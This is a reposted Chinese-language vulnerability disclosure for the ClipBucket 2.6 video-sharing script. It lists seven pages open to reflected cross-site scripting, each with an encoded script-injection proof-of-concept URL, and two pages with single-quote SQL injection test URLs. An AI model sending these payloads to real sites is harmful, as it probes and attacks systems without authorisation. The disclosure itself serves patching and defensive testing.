标题: Multiple Vulnerability on ClipBucket 2.6 作者: YaDoY666 开发这网站: http://yadoy666.serverisdown.org 程序: Clip Bucket (Open Source Video Sharing) 影响版本: 2.6 Cross Site Scripting ==================== [[=]] http://www.2cto.com /[path]/channels.php [[=]] http://www.2cto.com /[path]/collections.php [[=]] http://www.2cto.com /[path]/groups.php [[=]] http://www.2cto.com /[path]/search_result.php [[=]] http://www.2cto.com /[path]/videos.php [[=]] http://www.2cto.com /[path]/view_collection.php [[=]] http://www.2cto.com /[path]/view_item.php 例子 : http://www.2cto.com /[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E& seo _cat_name=&sort=most_recent&time=all_time http://www.2cto.com /[path]/collections.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time http://www.2cto.com /[path]/groups.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time http://www.2cto.com /[path]/search_result.php?query=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&submit=Search&type= http://www.2cto.com /[path]/videos.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time http://www.2cto.com /[path]/view_collection.php?cid=9&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E http://www.2cto.com /[path]/view_item.php?collection=9&item=KWSWG7S983SY&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E SQL Injection ============== [[=]] http://www.2cto.com /[path]/channels.php [[=]] http://www.2cto.com /[path]/videos.php 示例测试: http://www.2cto.com /[path]/videos.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27 http://www.2cto.com /[path]/channels.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27
查看更多关于Clip Bucket 2.6多个缺陷及修复 - 网站安全 - 自学p的详细内容...